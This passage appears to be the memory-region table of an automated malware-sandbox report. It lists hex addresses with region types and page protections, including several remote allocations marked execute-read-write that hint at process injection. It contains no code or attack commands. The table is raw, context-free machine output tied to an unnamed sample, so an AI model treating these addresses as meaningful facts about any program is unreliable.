direct allocation
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
4E5C4FF000
|
stack
|
page read and write
|
||
|
5C19000
|
trusted library allocation
|
page read and write
|
||
|
165C62E4000
|
heap
|
page read and write
|
||
|
3014000
|
trusted library allocation
|
page read and write
|
||
|
165C6293000
|
heap
|
page read and write
|
||
|
165C4551000
|
heap
|
page read and write
|
||
|
6039000
|
heap
|
page read and write
|
||
|
603C000
|
heap
|
page read and write
|
||
|
31A3000
|
heap
|
page read and write
|
||
|
303A000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A80000
|
direct allocation
|
page read and write
|
||
|
8543000
|
heap
|
page read and write
|
||
|
165C4545000
|
heap
|
page read and write
|
||
|
797B000
|
stack
|
page read and write
|
||
|
6039000
|
heap
|
page read and write
|
||
|
165C4499000
|
heap
|
page read and write
|
||
|
1F3C07DE000
|
trusted library allocation
|
page read and write
|
||
|
165C63CB000
|
heap
|
page read and write
|
||
|
165C62E4000
|
heap
|
page read and write
|
||
|
165C62A8000
|
heap
|
page read and write
|
||
|
1F3B2291000
|
trusted library allocation
|
page read and write
|
||
|
2F39000
|
heap
|
page read and write
|
||
|
5BF1000
|
trusted library allocation
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
74EE000
|
stack
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
1F3B03BC000
|
heap
|
page read and write
|
||
|
6200000
|
direct allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
6030000
|
heap
|
page read and write
|
||
|
492E000
|
remote allocation
|
page execute and read and write
|
||
|
5FC0000
|
heap
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page read and write
|
||
|
6125000
|
heap
|
page read and write
|
||
|
1F3B04F1000
|
trusted library allocation
|
page read and write
|
||
|
1F3C88C0000
|
heap
|
page read and write
|
||
|
77BE000
|
stack
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
75EE6FF000
|
stack
|
page read and write
|
||
|
214B0000
|
heap
|
page read and write
|
||
|
3164000
|
heap
|
page read and write
|
||
|
1F3B0969000
|
trusted library allocation
|
page read and write
|
||
|
3060000
|
trusted library allocation
|
page read and write
|
||
|
7665000
|
heap
|
page read and write
|
||
|
165C43F0000
|
heap
|
page read and write
|
||
|
1F3B2356000
|
trusted library allocation
|
page read and write
|
||
|
8A50000
|
direct allocation
|
page read and write
|
||
|
165C6413000
|
heap
|
page read and write
|
||
|
6100000
|
direct allocation
|
page read and write
|
||
|
8775000
|
trusted library allocation
|
page read and write
|
||
|
165C628F000
|
heap
|
page read and write
|
||
|
77FE000
|
stack
|
page read and write
|
||
|
165C62A8000
|
heap
|
page read and write
|
||
|
165C63B0000
|
heap
|
page read and write
|
||
|
3F2E000
|
remote allocation
|
page execute and read and write
|
||
|
2770000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
7DF470B20000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E5C0FA000
|
stack
|
page read and write
|
||
|
1F3B226B000
|
trusted library allocation
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
2170F000
|
stack
|
page read and write
|
||
|
6074000
|
heap
|
page read and write
|
||
|
7649000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
1F3B03E1000
|
heap
|
page read and write
|
||
|
1F3B10A6000
|
trusted library allocation
|
page read and write
|
||
|
1F3AE6A0000
|
heap
|
page read and write
|
||
|
1F3C07ED000
|
trusted library allocation
|
page read and write
|
||
|
851B000
|
heap
|
page read and write
|
||
|
165C44AF000
|
heap
|
page read and write
|
||
|
8A10000
|
trusted library allocation
|
page read and write
|
||
|
8400000
|
trusted library allocation
|
page read and write
|
||
|
1F3B1ACE000
|
trusted library allocation
|
page read and write
|
||
|
165C4551000
|
heap
|
page read and write
|
||
|
6290000
|
heap
|
page read and write
|
||
|
7707000
|
heap
|
page read and write
|
||
|
75EE5FE000
|
stack
|
page read and write
|
||
|
1F3AE930000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
165C4569000
|
heap
|
page read and write
|
||
|
1F3B09EC000
|
trusted library allocation
|
page read and write
|
||
|
772B000
|
heap
|
page read and write
|
||
|
6220000
|
direct allocation
|
page read and write
|
||
|
765B000
|
heap
|
page read and write
|
||
|
4BF1000
|
trusted library allocation
|
page read and write
|
||
|
75EE77E000
|
stack
|
page read and write
|
||
|
1F3B0577000
|
trusted library allocation
|
page read and write
|
||
|
165C4564000
|
heap
|
page read and write
|
||
|
7FF848CF6000
|
trusted library allocation
|
page read and write
|
||
|
21800000
|
remote allocation
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
1F3B241D000
|
trusted library allocation
|
page read and write
|
||
|
75EEBBE000
|
stack
|
page read and write
|
||
|
2B2E000
|
remote allocation
|
page execute and read and write
|
||
|
165C629B000
|
heap
|
page read and write
|
||
|
165C6288000
|
heap
|
page read and write
|
||
|
165C44D5000
|
heap
|
page read and write
|
||
|
1F3AE910000
|
trusted library allocation
|
page read and write
|
||
|
31D7000
|
heap
|
page read and write
|
||
|
4C52000
|
trusted library allocation
|
page read and write
|
||
|
7130000
|
direct allocation
|
page read and write
|
||
|
165C62A0000
|
heap
|
page read and write
|
||
|
1F3B0310000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
1F3B0440000
|
heap
|
page execute and read and write
|
||
|
1F3C89F4000
|
heap
|
page read and write
|
||
|
3029000
|
trusted library allocation
|
page read and write
|
||
|
8A60000
|
direct allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
31AE000
|
heap
|
page read and write
|
||
|
165C4567000
|
heap
|
page read and write
|
||
|
6280000
|
direct allocation
|
page read and write
|
||
|
165C4508000
|
heap
|
page read and write
|
||
|
1F3B0985000
|
trusted library allocation
|
page read and write
|
||
|
6210000
|
direct allocation
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
B2DE000
|
direct allocation
|
page execute and read and write
|
||
|
75EEABE000
|
stack
|
page read and write
|
||
|
1F3C04F1000
|
trusted library allocation
|
page read and write
|
||
|
2A00000
|
remote allocation
|
page execute and read and write
|
||
|
31D2000
|
heap
|
page read and write
|
||
|
94DE000
|
direct allocation
|
page execute and read and write
|
||
|
1F3AE960000
|
trusted library allocation
|
page read and write
|
||
|
7100000
|
direct allocation
|
page read and write
|
||
|
2F10000
|
trusted library section
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
165C4400000
|
heap
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
165C44D5000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
1F3AE710000
|
heap
|
page read and write
|
||
|
1F3AE9E0000
|
heap
|
page read and write
|
||
|
165C63EC000
|
heap
|
page read and write
|
||
|
1F3AE8F0000
|
trusted library allocation
|
page read and write
|
||
|
1F3AE9A0000
|
trusted library allocation
|
page read and write
|
||
|
165C454E000
|
heap
|
page read and write
|
||
|
165C63FA000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
|
1F3B04E0000
|
heap
|
page read and write
|
||
|
1F3B04C0000
|
heap
|
page execute and read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
8AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
75EE57E000
|
stack
|
page read and write
|
||
|
165C62B1000
|
heap
|
page read and write
|
||
|
75EE937000
|
stack
|
page read and write
|
||
|
88CC000
|
stack
|
page read and write
|
||
|
6110000
|
direct allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
603C000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
1F3B0193000
|
heap
|
page read and write
|
||
|
165C6294000
|
heap
|
page read and write
|
||
|
2190C000
|
stack
|
page read and write
|
||
|
1F3B10AE000
|
trusted library allocation
|
page read and write
|
||
|
75EEC3E000
|
stack
|
page read and write
|
||
|
5BFB000
|
trusted library allocation
|
page read and write
|
||
|
1F3B1B31000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
1F3B09AA000
|
trusted library allocation
|
page read and write
|
||
|
1F3B09E8000
|
trusted library allocation
|
page read and write
|
||
|
75EEB3E000
|
stack
|
page read and write
|
||
|
352E000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
8569000
|
heap
|
page read and write
|
||
|
75EF80B000
|
stack
|
page read and write
|
||
|
6074000
|
heap
|
page read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
7120000
|
direct allocation
|
page read and write
|
||
|
8A40000
|
trusted library allocation
|
page read and write
|
||
|
165C6281000
|
heap
|
page read and write
|
||
|
1F3B0380000
|
heap
|
page read and write
|
||
|
7FF848E27000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C42000
|
trusted library allocation
|
page read and write
|
||
|
60E0000
|
heap
|
page readonly
|
||
|
218CC000
|
stack
|
page read and write
|
||
|
70C0000
|
direct allocation
|
page read and write
|
||
|
6037000
|
heap
|
page read and write
|
||
|
6077000
|
heap
|
page read and write
|
||
|
783D000
|
stack
|
page read and write
|
||
|
1F3AE775000
|
heap
|
page read and write
|
||
|
1F3C8A1F000
|
heap
|
page read and write
|
||
|
4B0F000
|
stack
|
page read and write
|
||
|
165C4479000
|
heap
|
page read and write
|
||
|
75EE4FE000
|
stack
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
165C63D0000
|
heap
|
page read and write
|
||
|
7110000
|
direct allocation
|
page read and write
|
||
|
1F3C8A59000
|
heap
|
page read and write
|
||
|
301D000
|
trusted library allocation
|
page execute and read and write
|
||
|
165C6280000
|
heap
|
page read and write
|
||
|
7FF848C4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
165C455C000
|
heap
|
page read and write
|
||
|
7701000
|
heap
|
page read and write
|
||
|
4E5C1FE000
|
stack
|
page read and write
|
||
|
165C4730000
|
heap
|
page read and write
|
||
|
6270000
|
direct allocation
|
page read and write
|
||
|
165C4565000
|
heap
|
page read and write
|
||
|
1F3B0417000
|
heap
|
page read and write
|
||
|
75EF88B000
|
stack
|
page read and write
|
||
|
165C6400000
|
heap
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
165C62E4000
|
heap
|
page read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
4B40000
|
heap
|
page execute and read and write
|
||
|
260A0000
|
direct allocation
|
page read and write
|
||
|
1F3B108F000
|
trusted library allocation
|
page read and write
|
||
|
1F3B2295000
|
trusted library allocation
|
page read and write
|
||
|
165C62B1000
|
heap
|
page read and write
|
||
|
165C4545000
|
heap
|
page read and write
|
||
|
1F3C8A3D000
|
heap
|
page read and write
|
||
|
3042000
|
trusted library allocation
|
page read and write
|
||
|
888C000
|
stack
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D26000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F20000
|
trusted library section
|
page read and write
|
||
|
165C62B1000
|
heap
|
page read and write
|
||
|
6037000
|
heap
|
page read and write
|
||
|
165C4545000
|
heap
|
page read and write
|
||
|
1F3C89ED000
|
heap
|
page read and write
|
||
|
5FF7000
|
heap
|
page read and write
|
||
|
165C44E2000
|
heap
|
page read and write
|
||
|
7FF848C43000
|
trusted library allocation
|
page execute and read and write
|
||
|
165C6293000
|
heap
|
page read and write
|
||
|
6039000
|
heap
|
page read and write
|
||
|
76FD000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page execute and read and write
|
||
|
1F3AE80E000
|
heap
|
page read and write
|
||
|
1F3AE759000
|
heap
|
page read and write
|
||
|
165C454E000
|
heap
|
page read and write
|
||
|
72D0000
|
heap
|
page read and write
|
||
|
7F930000
|
trusted library allocation
|
page execute and read and write
|
||
|
26CC000
|
stack
|
page read and write
|
||
|
4D48000
|
trusted library allocation
|
page read and write
|
||
|
165C449F000
|
heap
|
page read and write
|
||
|
8AB0000
|
direct allocation
|
page read and write
|
||
|
1F3B10CC000
|
trusted library allocation
|
page read and write
|
||
|
6230000
|
direct allocation
|
page read and write
|
||
|
6037000
|
heap
|
page read and write
|
||
|
93B0000
|
direct allocation
|
page execute and read and write
|
||
|
1F3B0BB9000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
4A3C000
|
stack
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
6077000
|
heap
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
165C63DE000
|
heap
|
page read and write
|
||
|
4B45000
|
heap
|
page execute and read and write
|
||
|
7711000
|
heap
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
8410000
|
trusted library allocation
|
page read and write
|
||
|
4E5C7FE000
|
stack
|
page read and write
|
||
|
839E000
|
stack
|
page read and write
|
||
|
1F3B03FD000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
6024000
|
heap
|
page read and write
|
||
|
70F0000
|
direct allocation
|
page read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
2158E000
|
stack
|
page read and write
|
||
|
603C000
|
heap
|
page read and write
|
||
|
7FF848E25000
|
trusted library allocation
|
page read and write
|
||
|
1F3B2300000
|
trusted library allocation
|
page read and write
|
||
|
855D000
|
heap
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
1F3C89DC000
|
heap
|
page read and write
|
||
|
603C000
|
heap
|
page read and write
|
||
|
AB8000
|
stack
|
page read and write
|
||
|
1F3B10CE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
83F0000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
1F3B097D000
|
trusted library allocation
|
page read and write
|
||
|
76E6000
|
heap
|
page read and write
|
||
|
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
165C4745000
|
heap
|
page read and write
|
||
|
165C63FD000
|
heap
|
page read and write
|
||
|
777E000
|
stack
|
page read and write
|
||
|
165C4565000
|
heap
|
page read and write
|
||
|
8510000
|
heap
|
page read and write
|
||
|
4E5CAFB000
|
stack
|
page read and write
|
||
|
8561000
|
heap
|
page read and write
|
||
|
1F3AE755000
|
heap
|
page read and write
|
||
|
83E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F3AE6E0000
|
heap
|
page read and write
|
||
|
75EE67D000
|
stack
|
page read and write
|
||
|
1F3AE7C1000
|
heap
|
page read and write
|
||
|
7FF848C44000
|
trusted library allocation
|
page read and write
|
||
|
6120000
|
heap
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
1F3C8A73000
|
heap
|
page read and write
|
||
|
1F3C88A0000
|
heap
|
page read and write
|
||
|
6260000
|
direct allocation
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
53F5000
|
trusted library allocation
|
page read and write
|
||
|
8A70000
|
direct allocation
|
page read and write
|
||
|
165C44A0000
|
heap
|
page read and write
|
||
|
165C4559000
|
heap
|
page read and write
|
||
|
5D2E000
|
remote allocation
|
page execute and read and write
|
||
|
1F3B0470000
|
heap
|
page execute and read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
72C0000
|
heap
|
page read and write
|
||
|
75EE47D000
|
stack
|
page read and write
|
||
|
1F3AE75F000
|
heap
|
page read and write
|
||
|
7541000
|
heap
|
page read and write
|
||
|
165C63DB000
|
heap
|
page read and write
|
||
|
8A00000
|
trusted library allocation
|
page read and write
|
||
|
1F3B2508000
|
trusted library allocation
|
page read and write
|
||
|
165C63D0000
|
heap
|
page read and write
|
||
|
1F3C8D70000
|
heap
|
page read and write
|
||
|
2183E000
|
stack
|
page read and write
|
||
|
1F3B21BF000
|
trusted library allocation
|
page read and write
|
||
|
8960000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
313D000
|
heap
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page read and write
|
||
|
70D0000
|
direct allocation
|
page read and write
|
||
|
1F3B037E000
|
heap
|
page read and write
|
||
|
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
|
165C6298000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page readonly
|
||
|
75EF68E000
|
stack
|
page read and write
|
||
|
165C4545000
|
heap
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
1F3AE9E5000
|
heap
|
page read and write
|
||
|
7FF848C50000
|
trusted library allocation
|
page read and write
|
||
|
4BD8000
|
trusted library allocation
|
page read and write
|
||
|
1F3AE803000
|
heap
|
page read and write
|
||
|
3120000
|
trusted library allocation
|
page read and write
|
||
|
21910000
|
direct allocation
|
page read and write
|
||
|
165C4420000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
89F0000
|
trusted library allocation
|
page read and write
|
||
|
270B000
|
stack
|
page read and write
|
||
|
1F3B10BF000
|
trusted library allocation
|
page read and write
|
||
|
4B8E000
|
stack
|
page read and write
|
||
|
1F3AE670000
|
heap
|
page read and write
|
||
|
1F3AE920000
|
heap
|
page readonly
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
7FF848C5B000
|
trusted library allocation
|
page read and write
|
||
|
1F3C8A5E000
|
heap
|
page read and write
|
||
|
1F3C89A0000
|
heap
|
page read and write
|
||
|
165C62EA000
|
heap
|
page read and write
|
||
|
6240000
|
direct allocation
|
page read and write
|
||
|
1F3AE763000
|
heap
|
page read and write
|
||
|
75EF78D000
|
stack
|
page read and write
|
||
|
4BC0000
|
heap
|
page execute and read and write
|
||
|
8310000
|
trusted library allocation
|
page execute and read and write
|
||
|
A7C000
|
stack
|
page read and write
|
||
|
1F3AE73D000
|
heap
|
page read and write
|
||
|
75EE9B8000
|
stack
|
page read and write
|
||
|
8307000
|
stack
|
page read and write
|
||
|
3013000
|
trusted library allocation
|
page execute and read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
1F3B2318000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
1F3B23A8000
|
trusted library allocation
|
page read and write
|
||
|
1F3B0320000
|
heap
|
page read and write
|
||
|
6077000
|
heap
|
page read and write
|
||
|
1F3C0500000
|
trusted library allocation
|
page read and write
|
||
|
165C62AD000
|
heap
|
page read and write
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
165C4740000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
1F3B22C2000
|
trusted library allocation
|
page read and write
|
||
|
216CE000
|
stack
|
page read and write
|
||
|
1F3C89E6000
|
heap
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
trusted library allocation
|
page read and write
|
||
|
165C6294000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
21800000
|
remote allocation
|
page read and write
|
||
|
5C01000
|
trusted library allocation
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page read and write
|
||
|
1F3B0315000
|
heap
|
page read and write
|
||
|
165C449A000
|
heap
|
page read and write
|
||
|
C6DE000
|
direct allocation
|
page execute and read and write
|
||
|
4E5C2FE000
|
stack
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
75EE879000
|
stack
|
page read and write
|
||
|
2154F000
|
stack
|
page read and write
|
||
|
1F3B2304000
|
trusted library allocation
|
page read and write
|
||
|
8490000
|
heap
|
page read and write
|
||
|
9EDE000
|
direct allocation
|
page execute and read and write
|
||
|
600A000
|
heap
|
page read and write
|
||
|
165C628C000
|
heap
|
page read and write
|
||
|
4BE8000
|
heap
|
page read and write
|
||
|
83DE000
|
stack
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
603C000
|
heap
|
page read and write
|
||
|
1F3B0972000
|
trusted library allocation
|
page read and write
|
||
|
7630000
|
heap
|
page read and write
|
||
|
1F3B228D000
|
trusted library allocation
|
page read and write
|
||
|
1F3B0C5C000
|
trusted library allocation
|
page read and write
|
||
|
75EECBB000
|
stack
|
page read and write
|
||
|
165C62A4000
|
heap
|
page read and write
|
||
|
852D000
|
heap
|
page read and write
|
||
|
2187F000
|
stack
|
page read and write
|
||
|
165C454C000
|
heap
|
page read and write
|
||
|
5FC8000
|
heap
|
page read and write
|
||
|
1F3AE79C000
|
heap
|
page read and write
|
||
|
752F000
|
stack
|
page read and write
|
||
|
1F3AE680000
|
heap
|
page read and write
|
||
|
1F3AE75B000
|
heap
|
page read and write
|
||
|
1F3C0511000
|
trusted library allocation
|
page read and write
|
||
|
7639000
|
heap
|
page read and write
|
||
|
2164C000
|
stack
|
page read and write
|
||
|
1F3B237C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DF1000
|
trusted library allocation
|
page read and write
|
||
|
75EE8BF000
|
stack
|
page read and write
|
||
|
75EF70F000
|
stack
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
75EE7FE000
|
stack
|
page read and write
|
||
|
75EE1E3000
|
stack
|
page read and write
|
||
|
21800000
|
remote allocation
|
page read and write
|
||
|
1F3B0717000
|
trusted library allocation
|
page read and write
|
||
|
4E5CBFF000
|
stack
|
page read and write
|
There are 485 hidden memdumps, click here to show them.